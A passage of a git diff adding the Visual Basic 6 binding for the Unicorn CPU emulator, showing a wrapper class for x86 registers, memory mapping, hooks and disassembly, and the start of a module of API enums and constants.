Boolean) +Event Interrupt(ByVal intno As Long) + +'our vb enum is 0 based then mapped to the real C values so we can loop them to dump with name lookup +'these sub enums also keep the intellisense lists short and focused when reading/writing vals +'they are accessed through reg32, reg16, reg8, rs properties, or use raw full enum through reg property +'the names of each can be looked up through the reg32n etc properties +Public Enum reg_32 + eax_r = 0 + ecx_r = 1 + edx_r = 2 + ebx_r = 3 + esp_r = 4 + ebp_r = 5 + esi_r = 6 + edi_r = 7 +End Enum + +Public Enum reg_16 + ax_r = 0 + cx_r = 1 + dx_r = 2 + bx_r = 3 + sp_r = 4 + bp_r = 5 + si_r = 6 + di_r = 7 +End Enum + +Public Enum reg_8 + ah_r = 0 + ch_r = 1 + dh_r = 2 + bh_r = 3 + al_r = 4 + cl_r = 5 + dl_r = 6 + bl_r = 7 +End Enum + +Public Enum reg_Special + CS_r = 0 + DS_r = 1 + ES_r = 2 + FS_r = 3 + GS_r = 4 + SS_r = 5 + IDTR_r = 6 + GDTR_r = 7 + LDTR_r = 8 +End Enum + +Property Get DisasmAvail() As Boolean + DisasmAvail = m_DisasmOk +End Property + +Property Get lastError() As Long + lastError = ucs_errno(uc) +End Property + +Property Get hadErr() As Boolean + If Len(errMsg) > 0 Then hadErr = True +End Property + +Property Get eip() As Long + Dim e As uc_err, value As Long + e = ucs_reg_read(uc, UC_X86_REG_EIP, value) + eip = value +End Property + +Property Let eip(v As Long) + Dim e As uc_err + e = ucs_reg_write(uc, UC_X86_REG_EIP, v) +End Property + +Property Get eflags() As Long + Dim e As uc_err, value As Long + e = ucs_reg_read(uc, UC_X86_REG_EFLAGS, value) + eflags = value +End Property + +Property Let eflags(v As Long) + Dim e As uc_err + e = ucs_reg_write(uc, UC_X86_REG_EFLAGS, v) +End Property + + +'full access to all registers if you need it.. +Property Get reg(r As uc_x86_reg) As Long + Dim e As uc_err, value As Long + e = ucs_reg_read(uc, r, value) + reg = value +End Property + +Property Let reg(r As uc_x86_reg, value As Long) + Dim e As uc_err + e = ucs_reg_write(uc, r, value) +End Property + +'32 bit registers +Property Get reg32(r As reg_32) As Long + Dim e As uc_err, value As Long + If r < 0 Or r > UBound(r32) Then Exit Property + e = ucs_reg_read(uc, r32(r), value) + reg32 = value +End Property + +Property Let reg32(r As reg_32, value As Long) + Dim e As uc_err + If r < 0 Or r > UBound(r32) Then Exit Property + e = ucs_reg_write(uc, r32(r), value) +End Property + +'16 bit registers +Property Get reg16(r As reg_16) As Long + Dim e As uc_err, value As Long + If r < 0 Or r > UBound(r16) Then Exit Property + e = ucs_reg_read(uc, r16(r), value) + reg16 = CInt(value) +End Property + +Property Let reg16(r As reg_16, ByVal value As Long) + Dim e As uc_err + value = value And &HFFFF + If r < 0 Or r > UBound(r16) Then Exit Property + e = ucs_reg_write(uc, r16(r), value) +End Property + +'8 bit registers +Property Get reg8(r As reg_8) As Long + Dim e As uc_err, value As Long + If r < 0 Or r > UBound(r8) Then Exit Property + e = ucs_reg_read(uc, r8(r), value) + reg8 = value +End Property + +Property Let reg8(r As reg_8, ByVal value As Long) + Dim e As uc_err + value = value And &HFF + If r < 0 Or r > UBound(r8) Then Exit Property + e = ucs_reg_write(uc, r8(r), value) +End Property + +'special registers +Property Get rs(r As reg_Special) As Long + Dim e As uc_err, value As Long + If r < 0 Or r > UBound(rs_) Then Exit Property + e = ucs_reg_read(uc, rs_(r), value) + rs = value +End Property + +Property Let rs(r As reg_Special, ByVal value As Long) + Dim e As uc_err + If r < 0 Or r > UBound(rs_) Then Exit Property + e = ucs_reg_write(uc, rs_(r), value) +End Property + + +'reg index to name translation for looping +Property Get reg32n(r As reg_32) As String + If r < 0 Or r > UBound(r32_Name) Then Exit Property + reg32n = r32_Name(r) +End Property + +Property Get reg16n(r As reg_16) As String + If r < 0 Or r > UBound(r16_Name) Then Exit Property + reg16n = r16_Name(r) +End Property + +Property Get reg8n(r As reg_8) As String + If r < 0 Or r > UBound(r8_Name) Then Exit Property + reg8n = r8_Name(r) +End Property + +Property Get rsn(r As reg_Special) As String + If r < 0 Or r > UBound(rs_Name) Then Exit Property + rsn = rs_Name(r) +End Property + +Function regDump(Optional includeState As Boolean = True) As String + Dim i As Long + Dim tmp As String + + For i = 0 To UBound(r32) + tmp = tmp & reg32n(i) & "=" & Hex(reg32(i)) & " " + 'if i mod 3 = 0 and i <> 0 then tmp = tmp & vbcrlf + Next + + regDump = tmp + + If includeState Then + regDump = regDump & "eip=" & Hex(Me.eip) & " " & dumpFlags() + End If + +End Function + +Function dumpFlags() As String + + Dim ret() As String + Dim n As Variant + Dim i As Long + Dim flags As Long + + 'http://www.c-jump.com/CIS77/ASM/Instructions/I77_0050_eflags.htm + n = Array("C ", 0, "P ", 0, "A ", 0, "Z ", "S ", _ + "T ", "I ", "D ", "O ", "IOPL ", "IOPL ", "NT ", 0, _ + "RF ", "VM ", "AC ", "VIF ", "VIP ", "ID ", 0) + + flags = Me.eflags + push ret, "EFL " & Hex(flags) + + For i = 0 To 21 + If flags And ULong(1, i, op_lsh) Then + If n(i) <> 0 Then push ret, n(i) + End If + Next + + dumpFlags = Join(ret, " ") + + +End Function + +Private Sub Class_Initialize() + + Dim e As uc_err + + 'mapping our simplified to real values.. + r32 = Array(UC_X86_REG_EAX, UC_X86_REG_ECX, UC_X86_REG_EDX, UC_X86_REG_EBX, UC_X86_REG_ESP, UC_X86_REG_EBP, UC_X86_REG_ESI, UC_X86_REG_EDI) + r32_Name = Array("eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi") + + r16 = Array(UC_X86_REG_AX, UC_X86_REG_CX, UC_X86_REG_DX, UC_X86_REG_BX, UC_X86_REG_SP, UC_X86_REG_BP, UC_X86_REG_SI, UC_X86_REG_DI) + r16_Name = Array("ax", "cx", "dx", "bx", "sp", "bp", "si", "di") + + r8 = Array(UC_X86_REG_AH, UC_X86_REG_CH, UC_X86_REG_DH, UC_X86_REG_BH, UC_X86_REG_AL, UC_X86_REG_CL, UC_X86_REG_DL, UC_X86_REG_Bl) + r8_Name = Array("ah", "ch", "dh", "bh", "al", "cl", "dl", "bl") + + rs_ = Array(UC_X86_REG_CS, UC_X86_REG_DS, UC_X86_REG_ES, UC_X86_REG_FS, UC_X86_REG_GS, UC_X86_REG_SS, UC_X86_REG_IDTR, UC_X86_REG_GDTR, UC_X86_REG_LDTR) + rs_Name = Array("cs", "ds", "es", "fs", "gs", "ss", "idtr", "gdtr", "ldtr") + + 'just to ensure IDE finds the dll before we try to use it... + Const dllName As String = "ucvbshim.dll" + + If Len(UNICORN_PATH) = 0 Then + UNICORN_PATH = vbNullString + ElseIf FolderExists(UNICORN_PATH) Then + UNICORN_PATH = UNICORN_PATH & IIf(Right(UNICORN_PATH, 1) = "\", "", "\") & "unicorn.dll" + End If + + If hLib = 0 Then + hLib = GetModuleHandle(dllName) + If hLib = 0 Then + hLib = LoadLibrary(GetParentFolder(UNICORN_PATH) & "\" & dllName) + If hLib = 0 Then + hLib = LoadLibrary(dllName) + If hLib = 0 Then + errMsg = "Could not load " & dllName + Exit Sub + End If + End If + End If + End If + + If DYNLOAD = 0 Then + DYNLOAD = ucs_dynload(UNICORN_PATH) + If DYNLOAD = 0 Then + errMsg = "Dynamic Loading of unicorn.dll failed " & IIf(Len(UNICORN_PATH) > 0, "path: " & UNICORN_PATH, "") + Exit Sub + End If + End If + + ucs_version major, minor + Version = major & "." & minor + + If ucs_arch_supported(UC_ARCH_X86) <> 1 Then + errMsg = "UC_ARCH_X86 not supported" + Exit Sub + End If + + e = ucs_open(UC_ARCH_X86, UC_MODE_32, uc) + If e <> uc_err_ok Then + errMsg = "Failed to create new x86 32bit engine instance " & err2str(e) + Exit Sub + End If + + If GetProcAddress(hLib, "disasm_addr") <> 0 Then m_DisasmOk = True + + instances.Add Me, "objptr:" & ObjPtr(Me) + +End Sub + +Private Sub Class_Terminate() + If uc = 0 Then Exit Sub + stopEmu + ucs_close uc + On Error Resume Next + instances.Remove "objptr:" & ObjPtr(Me) +End Sub + +Function mapMem(address As Long, size As Long, Optional protection As uc_prot = UC_PROT_ALL) As Boolean + + Dim addr As Currency + Dim e As uc_err + + errMsg = Empty + addr = lng2Cur(address) + + e = ucs_mem_map(uc, addr, size, protection) + + If e <> uc_err_ok Then + errMsg = err2str(e) + Exit Function + End If + + mapMem = True + +End Function + +'address and size must be 4kb aligned, real buffer must be at least of size, and not go out of scope! +Function mapMemPtr(ByRef b() As Byte, address As Long, size As Long, Optional protection As uc_prot = UC_PROT_ALL) As Boolean + + Dim addr As Currency + Dim e As uc_err + + errMsg = Empty + addr = lng2Cur(address) + + If UBound(b) < size Then + errMsg = "Buffer is < size" + Exit Function + End If + + If size Mod &H1000 <> 0 Then + errMsg = "Size must be 4kb aligned" + Exit Function + End If + + If address Mod &H1000 <> 0 Then + errMsg = "address must be 4kb aligned" + Exit Function + End If + + e = ucs_mem_map_ptr(uc, addr, size, protection, VarPtr(b(0))) + + If e <> uc_err_ok Then + errMsg = err2str(e) + Exit Function + End If + + mapMemPtr = True + +End Function + +Function findAlloc(address As Long, Optional inRange As Boolean = False) As CMemRegion + Dim m As CMemRegion + Dim found As Boolean + + For Each m In getMemMap() + If inRange Then + If ULong(address, m.address, op_gteq) = 1 And ULong(address, m.address, op_lteq) = 1 Then found = True + Else + If m.address = address Then found = True + End If + If found Then + Set findAlloc = m + Exit Function + End If + Next +End Function + +'we could accept a variant here instead of CMemRegion +'if typename(v) = "Long" then enum regions and find cmem, else expect CMemRegion.. +'would be convient.. or a findAlloc(base as long) as CMemRegion +Function changePermissions(m As CMemRegion, newProt As uc_prot) + Dim e As uc_err + Dim addr64 As Currency + + errMsg = Empty + + If m Is Nothing Then Exit Function + + If newProt = m.perm Then + changePermissions = True + Exit Function + End If + + addr64 = lng2Cur(m.address) + + e = ucs_mem_protect(uc, addr64, m.size, newProt) + + If e <> uc_err_ok Then + errMsg = err2str(e) + Exit Function + End If + + m.perm = newProt + changePermissions = True + +End Function + + +Function unMapMem(base As Long) As Boolean + + Dim m As CMemRegion + Dim e As uc_err + Dim addr64 As Currency + + errMsg = Empty + addr64 = lng2Cur(base) + + For Each m In getMemMap() + If m.address = base Then + e = ucs_mem_unmap(uc, addr64, m.size) + unMapMem = (e = uc_err_ok) + If Not unMapMem Then errMsg = err2str(e) + Exit Function + End If + Next + +End Function + +'this function maps and writes (note 32bit only right now) +Function writeBlock(address As Long, buf() As Byte, Optional perm As uc_prot = UC_PROT_ALL) As Boolean + + Dim addr As Currency + Dim e As uc_err + + addr = lng2Cur(address) + + errMsg = Empty + e = mem_write_block(uc, addr, buf(0), UBound(buf) + 1, perm) + If e <> uc_err_ok Then + errMsg = err2str(e) + Exit Function + End If + + writeBlock = True + +End Function + +'this function requires the memory already be mapped in, use writeBlock for easier access... +Function writeMem(address As Long, buf() As Byte) As Boolean + + Dim addr As Currency + Dim e As uc_err + + errMsg = Empty + addr = lng2Cur(address) + + e = ucs_mem_write(uc, addr, buf(0), UBound(buf) + 1) + If e <> uc_err_ok Then + errMsg = err2str(e) + Exit Function + End If + + writeMem = True + +End Function + +Function writeByte(address As Long, b As Byte) As Boolean + + Dim addr As Currency + Dim e As uc_err + Dim buf(0) As Byte + + errMsg = Empty + addr = lng2Cur(address) + buf(0) = b + + e = ucs_mem_write(uc, addr, buf(0), 1) + + If e <> uc_err_ok Then + errMsg = err2str(e) + Exit Function + End If + + writeByte = True + +End Function + +Function writeLong(address As Long, value As Long) As Boolean + + Dim addr As Currency + Dim e As uc_err + Dim buf(0 To 3) As Byte + + errMsg = Empty + addr = lng2Cur(address) + CopyMemory buf(0), ByVal VarPtr(value), 4 + + e = ucs_mem_write(uc, addr, buf(0), 4) + + If e <> uc_err_ok Then + errMsg = err2str(e) + Exit Function + End If + + writeLong = True + +End Function + +Function writeInt(address As Long, value As Integer) As Boolean + + Dim addr As Currency + Dim e As uc_err + Dim buf(0 To 1) As Byte + + errMsg = Empty + addr = lng2Cur(address) + CopyMemory buf(0), ByVal VarPtr(value), 2 + + e = ucs_mem_write(uc, addr, buf(0), 2) + + If e <> uc_err_ok Then + errMsg = err2str(e) + Exit Function + End If + + writeInt = True + +End Function + +Function readMem(address As Long, ByRef buf() As Byte, ByVal size As Long) As Boolean + + Dim addr As Currency + Dim e As uc_err + + errMsg = Empty + addr = lng2Cur(address) + ReDim buf(size - 1) '0 based.. + + e = ucs_mem_read(uc, addr, buf(0), UBound(buf) + 1) + If e <> uc_err_ok Then + errMsg = err2str(e) + Exit Function + End If + + readMem = True + +End Function + +Function readByte(address As Long, ByRef b As Byte) As Boolean + + Dim buf() As Byte + + readMem address, buf, 1 + If hadErr Then Exit Function + + b = buf(0) + readByte = True + +End Function + +Function readLong(address As Long, ByRef retVal As Long) As Boolean + + Dim buf() As Byte + + readMem address, buf, 4 + If hadErr Then Exit Function + + CopyMemory ByVal VarPtr(retVal), buf(0), 4 + readLong = True + +End Function + +Function readInt(address As Long, ByRef retVal As Integer) As Boolean + + Dim buf() As Byte + + readMem address, buf, 2 + If hadErr Then Exit Function + + CopyMemory ByVal VarPtr(retVal), buf(0), 2 + readInt = True + +End Function + + +Function saveContext() As Long + + Dim hContext As Long + Dim e As uc_err + + errMsg = Empty + e = ucs_context_alloc(uc, hContext) + + If e <> uc_err_ok Then + errMsg = err2str(e) + Exit Function + End If + + e = ucs_context_save(uc, hContext) + + If e <> uc_err_ok Then + errMsg = err2str(e) + e = ucs_free(hContext) + If e <> uc_err_ok Then errMsg = errMsg & " error freeing context: " & err2str(e) + Exit Function + End If + + saveContext = hContext + +End Function + +Function restoreContext(hContext As Long) As Boolean + + Dim e As uc_err + + errMsg = Empty + e = ucs_context_restore(uc, hContext) + + If e <> uc_err_ok Then + errMsg = err2str(e) + Exit Function + End If + + restoreContext = True + +End Function + +Function freeContext(hContext As Long) As Boolean + Dim e As uc_err + e = ucs_free(hContext) + If e <> uc_err_ok Then + errMsg = err2str(e) + Else + freeContext = True + End If +End Function + + +Function disasm(va As Long, Optional ByRef instrLen As Long) As String + + Dim buf As String, i As Long, b() As Byte + Dim dump As String + On Error Resume Next + + If Not m_DisasmOk Then + disasm = Right("00000000" & Hex(va), 8) + Exit Function + End If + + buf = String(300, Chr(0)) + + instrLen = disasm_addr(uc, va, buf, Len(buf)) + If instrLen < 1 Then + Select Case instrLen + Case -1: buf = "Buffer to small" + Case -2: buf = "Failed to read memory" + Case -3: buf = "Failed to disassemble" + Case Default: buf = "Unknown error " & instrLen + End Select + dump = "?? ?? ??" + GoTo end_of_func + End If + + i = InStr(buf, Chr(0)) + If i > 2 Then buf = VBA.Left(buf, i - 1) Else buf = Empty + + readMem va, b(), instrLen + + For i = 0 To UBound(b) + dump = dump & hhex(b(i)) & " " + Next + +end_of_func: + disasm = Right("00000000" & Hex(va), 8) & " " & rpad(dump, 25) & buf + +End Function + +Function startEmu(beginAt As Long, endAt As Long, Optional timeout As Long = 0, Optional count As Long = 0) As Boolean + + Dim e As uc_err + Dim a As Currency, b As Currency, t As Currency + + a = lng2Cur(beginAt) + b = lng2Cur(endAt) + t = lng2Cur(timeout) + + errMsg = Empty + e = ucs_emu_start(uc, a, b, t, count) + If e <> uc_err_ok Then + errMsg = err2str(e) + Exit Function + End If + + startEmu = True + +End Function + +Function stopEmu() As Boolean + Dim e As uc_err + errMsg = Empty + e = ucs_emu_stop(uc) + If e <> uc_err_ok Then + errMsg = err2str(e) + Exit Function + End If + stopEmu = True +End Function + + + Function addHook(catagory As hookCatagory, flags As uc_hook_type, Optional beginAt As Long = 1, Optional endAt As Long = 0) As Boolean + + Dim e As uc_err + Dim hHook As Long 'handle to remove hook + Dim a As Currency, b As Currency + + e = -1 + a = lng2Cur(beginAt) + b = lng2Cur(endAt) + errMsg = Empty + + If KeyExistsInCollection(hooks, "flags:" & flags) Then + addHook = True + Exit Function + End If + + If catagory = hc_code Then e = ucs_hook_add(uc, hHook, flags, AddressOf code_hook, ObjPtr(Me), a, b, catagory) + If catagory = hc_mem Then e = ucs_hook_add(uc, hHook, flags, AddressOf mem_hook, ObjPtr(Me), a, b, catagory) + If catagory = hc_memInvalid Then e = ucs_hook_add(uc, hHook, flags, AddressOf invalid_mem_hook, ObjPtr(Me), a, b, catagory) + If catagory = hc_block Then e = ucs_hook_add(uc, hHook, flags, AddressOf block_hook, ObjPtr(Me), a, b, catagory) + If catagory = hc_int Then e = ucs_hook_add(uc, hHook, flags, AddressOf interrupt_hook, ObjPtr(Me), a, b, catagory) + + If e = -1 Then + errMsg = "Unimplemented hook catagory" + Exit Function + End If + + If e <> uc_err_ok Then + errMsg = err2str(e) + Exit Function + End If + + hooks.Add hHook, "flags:" & flags + addHook = True + + End Function + +'actually these appear to use different prototypes for each instruction? (only in/out examples seen...) +'what about all the others? not implemented yet in c or vb callback +'Function hookInstruction(i As uc_x86_insn, Optional beginAt As Long = 1, Optional endAt As Long = 0) As Boolean +' +' Dim e As uc_err +' Dim hHook As Long 'handle to remove hook +' Dim a As Currency, b As Currency +' +' If i = UC_X86_INS_INVALID Then Exit Function +' +' e = -1 +' a = lng2Cur(beginAt) +' b = lng2Cur(endAt) +' errMsg = Empty +' +' If KeyExistsInCollection(hooks, "instr:" & i) Then +' hookInstruction = True +' Exit Function +' End If +' +' e = ucs_hook_add(uc, hHook, UC_HOOK_INSN, AddressOf instruction_hook, ObjPtr(Me), a, b, hc_inst, i) +' +' If e <> UC_ERR_OK Then +' errMsg = err2str(e) +' Exit Function +' End If +' +' hooks.Add hHook, "instr:" & i +' hookInstruction = True +' +' End Function + + +Function removeHook(ByVal flags As uc_hook_type) As Boolean + + On Error Resume Next + + Dim hHook As Long, e As uc_err, wasInstr As Boolean + + errMsg = Empty + hHook = hooks("flags:" & flags) + + If hHook = 0 Then + hHook = hooks("instr:" & flags) 'maybe it was an instruction hook? + If hHook = 0 Then + errMsg = "Hook handle not found for supplied flags." + Exit Function + Else + wasInstr = True + End If + End If + + e = ucs_hook_del(uc, hHook) + + If e <> uc_err_ok Then + errMsg = err2str(e) + Exit Function + End If + + If wasInstr Then + hooks.Remove "instr:" & flags + Else + hooks.Remove "flags:" & flags + End If + + removeHook = True + +End Function + +Function getMemMap() As Collection 'of 32bit CMemRegion + Dim c As New Collection + Dim ret As New Collection + Dim mem As CMemRegion + Dim e As uc_err + Dim s, tmp, v + + errMsg = Empty + Set getMemMap = ret + + e = get_memMap(uc, c) + + If e <> uc_err_ok Then + errMsg = err2str(e) + Exit Function + End If + + For Each s In c '&h1000000,&h11fffff,&h7 these should always be 32bit safe values created in this class.. + If Len(s) > 0 Then + tmp = Split(s, ",") + If UBound(tmp) = 2 Then + Set mem = New CMemRegion + mem.address = CLng(tmp(0)) + mem.endsAt = CLng(tmp(1)) + mem.size = ULong(mem.endsAt, mem.address, op_sub) + 1 'vb native math is signed only..we play it safe.. + mem.perm = CLng(tmp(2)) + ret.Add mem + End If + End If + Next + +End Function + + +'these are internal functions used from the callback in the module to route the message to the event interface +'little confusing but in the end easier for the end user...also lays foundation for multiple live instances +'(although only one can run at a time since vb is single threaded) + +Friend Function internal_invalid_mem_hook(ByVal t As uc_mem_type, ByVal address As Currency, ByVal size As Long, ByVal value As Currency) As Long + Dim addr As Long, v As Long, continue As Boolean + addr = cur2lng(address) + v = cur2lng(value) + RaiseEvent InvalidMem(t, addr, size, v, continue) + internal_invalid_mem_hook = IIf(continue, 1, 0) +End Function + +Friend Sub internal_mem_hook(ByVal t As uc_mem_type, ByVal address As Currency, ByVal size As Long, ByVal value As Currency) + Dim addr As Long, v As Long + addr = cur2lng(address) + v = cur2lng(value) + RaiseEvent MemAccess(t, addr, size, v) +End Sub + +Friend Sub internal_code_hook(ByVal address As Currency, ByVal size As Long) + Dim addr As Long + addr = cur2lng(address) + RaiseEvent CodeHook(addr, size) +End Sub + +Friend Sub internal_block_hook(ByVal address As Currency, ByVal size As Long) + Dim addr As Long + addr = cur2lng(address) + RaiseEvent BlockHook(addr, size) +End Sub + +Friend Sub internal_interrupt_hook(ByVal intno As Long) + RaiseEvent Interrupt(intno) +End Sub + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/uc_def.bas b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/uc_def.bas new file mode 100644 index 0000000..823819c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/uc_def.bas @@ -0,0 +1,2504 @@ +Attribute VB_Name = "uc_def" +Option Explicit + +'Unicorn Engine x86 32bit wrapper class for vb6 + +'Contributed by: FireEye FLARE team +'Author: David Zimmer <david.zimmer@fireeye.com>, <dzzie@yahoo.com> +'License: Apache + +' supported api: +' ucs_version +' ucs_arch_supported +' ucs_open +' ucs_close +' uc_reg_write +' uc_reg_read +' uc_mem_write +' UC_MEM_READ +' uc_emu_start +' uc_emu_stop +' ucs_hook_add +' uc_mem_map +' uc_hook_del +' uc_mem_regions +' uc_mem_map_ptr +' uc_context_alloc +' uc_free +' uc_context_save +' uc_context_restore +' uc_mem_unmap +' uc_mem_protect +' uc_strerror +' uc_errno + +' supported hooks: +' UC_HOOK_CODE +' UC_HOOK_BLOCK +' memory READ/WRITE/FETCH +' invalid memory access +' interrupts +' +' bonus: +' disasm_addr (32bit only uses libdasm) +' mem_write_block (map and write data auto handles alignment) +' get_memMap (wrapper for uc_mem_regions) +' +' + +'sample supports multiple instances, required since callbacks must be in a shared module +Global instances As New Collection +Global UNICORN_PATH As String +Global DYNLOAD As Long + +Public Enum uc_arch + UC_ARCH_ARM = 1 ' ARM architecture (including Thumb, Thumb-2) + UC_ARCH_ARM64 = 2 ' ARM-64, also called AArch64okok + UC_ARCH_MIPS = 3 ' Mips architecture + UC_ARCH_X86 = 4 ' X86 architecture (including x86 & x86-64) + UC_ARCH_PPC = 5 ' PowerPC architecture (currently unsupported) + UC_ARCH_SPARC = 6 ' Sparc architecture + UC_ARCH_M68K = 7 ' M68K architecture + UC_ARCH_MAX = 8 +End Enum + +Public Enum uc_prot + UC_PROT_NONE = 0 + UC_PROT_READ = 1 + UC_PROT_WRITE = 2 + UC_PROT_EXEC = 4 + UC_PROT_ALL = 7 +End Enum + +Public Enum uc_err + uc_err_ok = 0 ' No error: everything was fine + UC_ERR_NOMEM = 1 ' Out-Of-Memory error: uc_open(), uc_emulate() + UC_ERR_ARCH = 2 ' Unsupported architecture: uc_open() + UC_ERR_HANDLE = 3 ' Invalid handle + UC_ERR_MODE = 4 ' Invalid/unsupported mode: uc_open() + UC_ERR_VERSION = 5 ' Unsupported version (bindings) + UC_ERR_READ_UNMAPPED = 6 ' Quit emulation due to READ on unmapped memory: uc_emu_start() + UC_ERR_WRITE_UNMAPPED = 7 ' Quit emulation due to WRITE on unmapped memory: uc_emu_start() + UC_ERR_FETCH_UNMAPPED = 8 ' Quit emulation due to FETCH on unmapped memory: uc_emu_start() + UC_ERR_HOOK = 9 ' Invalid hook type: uc_hook_add() + UC_ERR_INSN_INVALID = 10 ' Quit emulation due to invalid instruction: uc_emu_start() + UC_ERR_MAP = 11 ' Invalid memory mapping: uc_mem_map() + UC_ERR_WRITE_PROT = 12 ' Quit emulation due to UC_MEM_WRITE_PROT violation: uc_emu_start() + UC_ERR_READ_PROT = 13 ' Quit emulation due to UC_MEM_READ_PROT violation: uc_emu_start() + UC_ERR_FETCH_PROT = 14 ' Quit emulation due to UC_MEM_FETCH_PROT violation: uc_emu_start() + UC_ERR_ARG = 15 ' Inavalid argument provided to uc_xxx function (See specific function API) + UC_ERR_READ_UNALIGNED = 16 ' Unaligned read + UC_ERR_WRITE_UNALIGNED = 17 ' Unaligned write + UC_ERR_FETCH_UNALIGNED = 18 ' Unaligned fetch + UC_ERR_HOOK_EXIST = 19 ' hook for this event already existed + UC_ERR_RESOURCE = 20 ' Insufficient resource: uc_emu_start() + UC_ERR_EXCEPTION = 21 ' Unhandled CPU exception +End Enum + +' All type of memory accesses for UC_HOOK_MEM_* +Public Enum uc_mem_type + UC_MEM_READ = 16 ' Memory is read from + uc_mem_write = 17 ' Memory is written to + UC_MEM_FETCH = 18 ' Memory is fetched + UC_MEM_READ_UNMAPPED = 19 ' Unmapped memory is read from + UC_MEM_WRITE_UNMAPPED = 20 ' Unmapped memory is written to + UC_MEM_FETCH_UNMAPPED = 21 ' Unmapped memory is fetched + UC_MEM_WRITE_PROT = 22 ' Write to write protected, but mapped, memory + UC_MEM_READ_PROT = 23 ' Read from read protected, but mapped, memory + UC_MEM_FETCH_PROT = 24 ' Fetch from non-executable, but mapped, memory + UC_MEM_READ_AFTER = 25 ' Memory is read from (successful access) +End Enum + +Public Enum uc_mode 'from /bindings/dotnet/common.fs + UC_MODE_LITTLE_ENDIAN = 0 'little-endian mode (default mode) + UC_MODE_BIG_ENDIAN = 1073741824 'big-endian mode +' UC_MODE_ARM = 0 'ARM mode +' UC_MODE_THUMB = 16 'THUMB mode (including Thumb-2) +' UC_MODE_MCLASS = 32 'ARM's Cortex-M series (currently unsupported) +' UC_MODE_V8 = 64 'ARMv8 A32 encodings for ARM (currently unsupported) +' UC_MODE_MICRO = 16 'MicroMips mode (currently unsupported) +' UC_MODE_MIPS3 = 32 'Mips III ISA (currently unsupported) +' UC_MODE_MIPS32R6 = 64 'Mips32r6 ISA (currently unsupported) +' UC_MODE_MIPS32 = 4 'Mips32 ISA +' UC_MODE_MIPS64 = 8 'Mips64 ISA + UC_MODE_16 = 2 '16-bit mode + UC_MODE_32 = 4 '32-bit mode + UC_MODE_64 = 8 '64-bit mode +' UC_MODE_PPC32 = 4 '32-bit mode (currently unsupported) +' UC_MODE_PPC64 = 8 '64-bit mode (currently unsupported) +' UC_MODE_QPX = 16 'Quad Processing eXtensions mode (currently unsupported) +' UC_MODE_SPARC32 = 4 '32-bit mode +' UC_MODE_SPARC64 = 8 '64-bit mode +' UC_MODE_V9 = 16 'SparcV9 mode (currently unsupported) +End Enum + +Public Enum uc_hook_type 'from /bindings/dotnet/common.fs + UC_HOOK_INTR = 1 ' Hook all interrupt/syscall events + UC_HOOK_INSN = 2 ' Hook a particular instruction + UC_HOOK_CODE = 4 ' Hook a range of code + UC_HOOK_BLOCK = 8 ' Hook basic blocks + UC_HOOK_MEM_READ_UNMAPPED = 16 ' Hook for memory read on unmapped memory + UC_HOOK_MEM_WRITE_UNMAPPED = 32 ' Hook for invalid memory write events + UC_HOOK_MEM_FETCH_UNMAPPED = 64 ' Hook for invalid memory fetch for execution events + UC_HOOK_MEM_READ_PROT = 128 ' Hook for memory read on read-protected memory + UC_HOOK_MEM_WRITE_PROT = 256 ' Hook for memory write on write-protected memory + UC_HOOK_MEM_FETCH_PROT = 512 ' Hook for memory fetch on non-executable memory + UC_HOOK_MEM_READ = 1024 ' Hook memory read events. + UC_HOOK_MEM_WRITE = 2048 ' Hook memory write events. + UC_HOOK_MEM_FETCH = 4096 ' Hook memory fetch for execution events + UC_HOOK_MEM_READ_AFTER = 8192 ' Hook memory read events, but only successful access.(triggered after successful read.) + UC_HOOK_MEM_UNMAPPED = 112 + UC_HOOK_MEM_PROT = 896 + UC_HOOK_MEM_READ_INVALID = 144 + UC_HOOK_MEM_WRITE_INVALID = 288 + UC_HOOK_MEM_FETCH_INVALID = 576 + UC_HOOK_MEM_INVALID = 1008 + UC_HOOK_MEM_VALID = 7168 +End Enum + +Public Enum hookCatagory + hc_code = 0 + hc_block = 1 + hc_inst = 2 + hc_int = 3 + hc_mem = 4 + hc_memInvalid = 5 +End Enum + +Public Enum uc_x86_reg + UC_X86_REG_INVALID = 0 + UC_X86_REG_AH = 1 + UC_X86_REG_AL = 2 + UC_X86_REG_AX = 3 + UC_X86_REG_BH = 4 + UC_X86_REG_Bl = 5 + UC_X86_REG_BP = 6 + UC_X86_REG_BPL = 7 + UC_X86_REG_BX = 8 + UC_X86_REG_CH = 9 + UC_X86_REG_CL = 10 + UC_X86_REG_CS = 11 + UC_X86_REG_CX = 12 + UC_X86_REG_DH = 13 + UC_X86_REG_DI = 14 + UC_X86_REG_DIL = 15 + UC_X86_REG_DL = 16 + UC_X86_REG_DS = 17 + UC_X86_REG_DX = 18 + UC_X86_REG_EAX = 19 + UC_X86_REG_EBP = 20 + UC_X86_REG_EBX = 21 + UC_X86_REG_ECX = 22 + UC_X86_REG_EDI = 23 + UC_X86_REG_EDX = 24 + UC_X86_REG_EFLAGS = 25 + UC_X86_REG_EIP = 26 + UC_X86_REG_EIZ = 27 + UC_X86_REG_ES = 28 + UC_X86_REG_ESI = 29 + UC_X86_REG_ESP = 30 + UC_X86_REG_FPSW = 31 + UC_X86_REG_FS = 32 + UC_X86_REG_GS = 33 + UC_X86_REG_IP = 34 + UC_X86_REG_RAX = 35 + UC_X86_REG_RBP = 36 + UC_X86_REG_RBX = 37 + UC_X86_REG_RCX = 38 + UC_X86_REG_RDI = 39 + UC_X86_REG_RDX = 40 + UC_X86_REG_RIP = 41 + UC_X86_REG_RIZ = 42 + UC_X86_REG_RSI = 43 + UC_X86_REG_RSP = 44 + UC_X86_REG_SI = 45 + UC_X86_REG_SIL = 46 + UC_X86_REG_SP = 47 + UC_X86_REG_SPL = 48 + UC_X86_REG_SS = 49 + UC_X86_REG_CR0 = 50 + UC_X86_REG_CR1 = 51 + UC_X86_REG_CR2 = 52 + UC_X86_REG_CR3 = 53 + UC_X86_REG_CR4 = 54 + UC_X86_REG_CR5 = 55 + UC_X86_REG_CR6 = 56 + UC_X86_REG_CR7 = 57 + UC_X86_REG_CR8 = 58 + UC_X86_REG_CR9 = 59 + UC_X86_REG_CR10 = 60 + UC_X86_REG_CR11 = 61 + UC_X86_REG_CR12 = 62 + UC_X86_REG_CR13 = 63 + UC_X86_REG_CR14 = 64 + UC_X86_REG_CR15 = 65 + UC_X86_REG_DR0 = 66 + 